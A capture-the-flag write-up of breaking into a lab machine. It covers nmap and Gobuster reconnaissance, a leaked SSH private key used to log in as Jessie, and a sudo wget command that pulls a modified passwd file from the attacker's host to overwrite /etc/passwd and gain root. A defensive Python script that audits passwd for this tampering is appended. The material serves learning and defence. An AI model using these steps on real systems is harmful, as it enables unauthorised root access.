#Linux #Wget
NMAP Scan
nmap -sV -sC -p- 10.10.207.235
- To see the versions of the services running (-sV)
- To perform a script scan using the default set of scripts (-sC)
- To scan all ports from 1 through 65535 (-p-)
OPEN PORTS
- 22/tcp ssh
- 80/tcp http
Interesting info: A person named Jessie is mentioned in the website source code:
Let's try Nikto for vulnerability scanning.
Nikto is an open source web server and web application scanner. Nikto can perform comprehensive tests against web servers for multiple security threats, including over 6700 potentially dangerous files/programs. Nikto can also check for outdated web server software and version-specific problems. Here are some of the commonly used commands:
Nikto results reveal that the Apache server is outdated: version 2.4.18
A searchsploit analysis confirms an existing vulnerability on the Apache server.
Details of the CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation are summarized in the following link:
https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
Gobuster search suggests a hidden directory /sitemap (Status 301)
A further Gobuster search on http://10.10.207.235/sitemap suggests a hidden /.ssh directory hosting a private key!
What we need to do now is:
- Restrict the file permissions on the downloaded private key (ssh refuses keys that are readable by others):
chmod 600 jessie_id_rsa
- Log in over ssh using the private key:
ssh -i path/to/key_file username@remote_host
We can assume that the private key belongs to Jessie -- this name was mentioned in a comment line in the website source code (see above)
We now have the user flag captured. Let's explore the vulnerabilities for privilege escalation, starting with sudo -l to see the allowed commands.
It seems that we can use GTFOBins Wget vulnerability as explained here: https://gtfobins.github.io/gtfobins/wget/
Here are the steps that can be followed:
- Copy the target's /etc/passwd to the local host, generate a password hash for the root account, and put it in the password field of the root entry in that copy of passwd.
- Open an HTTP server on the local host:
sudo python3 -m http.server 80
- Transfer the modified passwd to the target machine (wget runs as root via sudo, so it can overwrite /etc/passwd):
sudo wget http://10.18.123.93/passwd -O /etc/passwd
- Elevate to root with the password set above:
su root
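The wget trick above leaves a tell-tale artifact on the box: a password hash sitting in the second field of /etc/passwd instead of the usual "x" that defers to /etc/shadow. The following audit script is an added example, not part of the original writeup; it runs over a constructed sample passwd and flags hashes stored in passwd, empty password fields, and extra UID 0 accounts, which is what a defender would check after such a box is reset or on a real host.

```python
import os
import re
from typing import Dict, List

# Constructed sample (not from the target): the root entry carries a hash
# directly in field 2, and a second UID 0 account has been added.
SAMPLE_PASSWD = """\
root:$6$saltsalt$CONSTRUCTEDHASHVALUE00000000000000000000000000000000000000000:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
backdoor:x:0:0::/root:/bin/bash
"""

# Field 2 should defer to /etc/shadow ("x") or be locked ("*", "!", "!!").
SAFE_PW_FIELDS = {"x", "*", "!", "!!", "!*"}
# crypt(3) hash prefixes: $1$ md5, $2*$ bcrypt, $5$ sha256, $6$ sha512, $y$ yescrypt
HASH_RE = re.compile(r"^\$(1|2[aby]?|5|6|y|7)\$")


def audit_passwd(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious /etc/passwd entry."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "user": line, "issue": "malformed entry"})
            continue
        user, pw, uid, _gid, *_ = fields
        if pw == "":
            findings.append({"line": lineno, "user": user, "issue": "empty password field"})
        elif pw not in SAFE_PW_FIELDS:
            kind = "hash" if HASH_RE.match(pw) else "unexpected value"
            findings.append({"line": lineno, "user": user,
                             "issue": f"password {kind} stored in /etc/passwd"})
        if uid == "0" and user != "root":
            findings.append({"line": lineno, "user": user, "issue": "non-root account with UID 0"})
    return findings


if __name__ == "__main__":
    # Audit the real file when available, otherwise the constructed sample.
    path = "/etc/passwd"
    data = open(path).read() if os.path.exists(path) else SAMPLE_PASSWD
    for f in audit_passwd(data):
        print(f"line {f['line']}: {f['user']}: {f['issue']}")
```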